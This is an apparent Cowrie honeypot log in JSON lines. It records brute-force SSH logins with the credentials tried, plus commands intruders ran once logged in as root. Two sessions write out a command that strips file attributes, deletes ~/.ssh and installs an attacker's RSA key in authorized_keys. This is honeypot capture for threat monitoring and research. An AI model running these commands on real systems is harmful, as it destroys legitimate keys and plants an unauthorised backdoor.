{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":58662,"dst_ip":"1.2.3.4","dst_port":22,"session":"b8b8ee768e01","protocol":"ssh","message":"New connection: 212.227.235.229:58662 (1.2.3.4:22) [session: b8b8ee768e01]","sensor":"my-vps","timestamp":"2025-09-09T05:48:25.970019Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.9.6","message":"Remote SSH version: SSH-2.0-libssh_0.9.6","sensor":"my-vps","timestamp":"2025-09-09T05:48:25.970776Z","src_ip":"212.227.235.229","session":"b8b8ee768e01"}
{"eventid":"cowrie.client.kex","hassh":"f555226df1963d1d3c09daf865abdc9a","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c;aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-dss"],"encCS":["aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: f555226df1963d1d3c09daf865abdc9a","sensor":"my-vps","timestamp":"2025-09-09T05:48:26.215839Z","src_ip":"212.227.235.229","session":"b8b8ee768e01"}
{"eventid":"cowrie.login.failed","username":"status","password":"111","message":"login attempt [status/111] failed","sensor":"my-vps","timestamp":"2025-09-09T05:48:27.239794Z","src_ip":"212.227.235.229","session":"b8b8ee768e01"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-09-09T05:48:28.487248Z","src_ip":"212.227.235.229","session":"b8b8ee768e01"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":37064,"dst_ip":"1.2.3.4","dst_port":22,"session":"97e13e9bb213","protocol":"ssh","message":"New connection: 212.227.235.229:37064 (1.2.3.4:22) [session: 97e13e9bb213]","sensor":"my-vps","timestamp":"2025-09-09T05:48:29.884049Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T05:48:29.887743Z","src_ip":"212.227.235.229","session":"97e13e9bb213"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T05:48:30.098638Z","src_ip":"212.227.235.229","session":"97e13e9bb213"}
{"eventid":"cowrie.login.success","username":"root","password":"Yq123456","message":"login attempt [root/Yq123456] succeeded","sensor":"my-vps","timestamp":"2025-09-09T05:48:31.110505Z","src_ip":"212.227.235.229","session":"97e13e9bb213"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T05:48:31.509028Z","src_ip":"212.227.235.229","session":"97e13e9bb213"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T05:48:31.509777Z","src_ip":"212.227.235.229","session":"97e13e9bb213"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T05:48:31.511366Z","src_ip":"212.227.235.229","session":"97e13e9bb213"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T05:48:31.682718Z","src_ip":"212.227.235.229","session":"97e13e9bb213"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T05:48:32.038945Z","src_ip":"212.227.235.229","session":"97e13e9bb213"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-09T05:48:32.039726Z","src_ip":"212.227.235.229","session":"97e13e9bb213"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-09T05:48:32.211707Z","src_ip":"212.227.235.229","session":"97e13e9bb213"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T05:48:32.212600Z","src_ip":"212.227.235.229","session":"97e13e9bb213"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":38544,"dst_ip":"1.2.3.4","dst_port":22,"session":"f65edef562fa","protocol":"ssh","message":"New connection: 212.227.235.229:38544 (1.2.3.4:22) [session: f65edef562fa]","sensor":"my-vps","timestamp":"2025-09-09T05:48:32.376116Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T05:48:32.376889Z","src_ip":"212.227.235.229","session":"f65edef562fa"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T05:48:32.543014Z","src_ip":"212.227.235.229","session":"f65edef562fa"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-09T05:48:33.250819Z","src_ip":"212.227.235.229","session":"f65edef562fa"}
{"eventid":"cowrie.session.connect","src_ip":"205.210.31.11","src_port":65124,"dst_ip":"1.2.3.4","dst_port":23,"session":"60894164a627","protocol":"telnet","message":"New connection: 205.210.31.11:65124 (1.2.3.4:23) [session: 60894164a627]","sensor":"my-vps","timestamp":"2025-09-09T05:48:33.753814Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":60135,"dst_ip":"1.2.3.4","dst_port":23,"session":"d503e34c897f","protocol":"telnet","message":"New connection: 212.227.125.160:60135 (1.2.3.4:23) [session: d503e34c897f]","sensor":"my-vps","timestamp":"2025-09-09T05:48:34.232060Z"}
{"eventid":"cowrie.session.closed","duration":"2.0","message":"Connection lost after 2.0 seconds","sensor":"my-vps","timestamp":"2025-09-09T05:48:34.419380Z","src_ip":"212.227.235.229","session":"f65edef562fa"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":39238,"dst_ip":"1.2.3.4","dst_port":22,"session":"3877a87079cd","protocol":"ssh","message":"New connection: 212.227.235.229:39238 (1.2.3.4:22) [session: 3877a87079cd]","sensor":"my-vps","timestamp":"2025-09-09T05:48:34.595962Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T05:48:34.596833Z","src_ip":"212.227.235.229","session":"3877a87079cd"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T05:48:34.769259Z","src_ip":"212.227.235.229","session":"3877a87079cd"}
{"eventid":"cowrie.session.closed","duration":"70.0","message":"Connection lost after 70.0 seconds","sensor":"my-vps","timestamp":"2025-09-09T05:48:35.271630Z","src_ip":"212.227.125.160","session":"7457d891163c"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-09T05:48:35.506412Z","src_ip":"212.227.235.229","session":"3877a87079cd"}
{"eventid":"cowrie.session.closed","duration":"5.8","message":"Connection lost after 5.8 seconds","sensor":"my-vps","timestamp":"2025-09-09T05:48:35.677578Z","src_ip":"212.227.235.229","session":"97e13e9bb213"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-09-09T05:48:35.679186Z","src_ip":"212.227.235.229","session":"3877a87079cd"}
{"eventid":"cowrie.session.closed","duration":9.883633613586426,"message":"Connection lost after 9 seconds","sensor":"my-vps","timestamp":"2025-09-09T05:48:43.637381Z","src_ip":"205.210.31.11","session":"60894164a627"}
{"eventid":"cowrie.session.closed","duration":13.636378526687622,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-09-09T05:48:47.868369Z","src_ip":"212.227.125.160","session":"d503e34c897f"}
{"eventid":"cowrie.session.connect","src_ip":"213.6.203.226","src_port":62369,"dst_ip":"1.2.3.4","dst_port":22,"session":"1b294786e7ba","protocol":"ssh","message":"New connection: 213.6.203.226:62369 (1.2.3.4:22) [session: 1b294786e7ba]","sensor":"my-vps","timestamp":"2025-09-09T05:48:53.665229Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T05:48:53.666276Z","src_ip":"213.6.203.226","session":"1b294786e7ba"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T05:48:53.734699Z","src_ip":"213.6.203.226","session":"1b294786e7ba"}
{"eventid":"cowrie.login.success","username":"root","password":"qw951","message":"login attempt [root/qw951] succeeded","sensor":"my-vps","timestamp":"2025-09-09T05:48:54.050142Z","src_ip":"213.6.203.226","session":"1b294786e7ba"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T05:48:54.238351Z","src_ip":"213.6.203.226","session":"1b294786e7ba"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T05:48:54.239069Z","src_ip":"213.6.203.226","session":"1b294786e7ba"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T05:48:54.240182Z","src_ip":"213.6.203.226","session":"1b294786e7ba"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-09T05:48:54.309770Z","src_ip":"213.6.203.226","session":"1b294786e7ba"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T05:48:54.512820Z","src_ip":"213.6.203.226","session":"1b294786e7ba"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-09T05:48:54.513811Z","src_ip":"213.6.203.226","session":"1b294786e7ba"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-09T05:48:54.584855Z","src_ip":"213.6.203.226","session":"1b294786e7ba"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-09T05:48:54.585703Z","src_ip":"213.6.203.226","session":"1b294786e7ba"}
{"eventid":"cowrie.session.connect","src_ip":"213.6.203.226","src_port":38319,"dst_ip":"1.2.3.4","dst_port":22,"session":"32da448c0cd2","protocol":"ssh","message":"New connection: 213.6.203.226:38319 (1.2.3.4:22) [session: 32da448c0cd2]","sensor":"my-vps","timestamp":"2025-09-09T05:48:54.651083Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T05:48:54.652013Z","src_ip":"213.6.203.226","session":"32da448c0cd2"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T05:48:54.719462Z","src_ip":"213.6.203.226","session":"32da448c0cd2"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-09T05:48:55.031941Z","src_ip":"213.6.203.226","session":"32da448c0cd2"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-09-09T05:48:56.108862Z","src_ip":"213.6.203.226","session":"32da448c0cd2"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":64030,"dst_ip":"1.2.3.4","dst_port":22,"session":"35c70c67b59a","protocol":"ssh","message":"New connection: 212.227.235.229:64030 (1.2.3.4:22) [session: 35c70c67b59a]","sensor":"my-vps","timestamp":"2025-09-09T05:48:56.119537Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T05:48:56.120265Z","src_ip":"212.227.235.229","session":"35c70c67b59a"}
{"eventid":"cowrie.session.connect","src_ip":"213.6.203.226","src_port":52893,"dst_ip":"1.2.3.4","dst_port":22,"session":"934fb743a105","protocol":"ssh","message":"New connection: 213.6.203.226:52893 (1.2.3.4:22) [session: 934fb743a105]","sensor":"my-vps","timestamp":"2025-09-09T05:48:56.176579Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T05:48:56.177945Z","src_ip":"213.6.203.226","session":"934fb743a105"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hm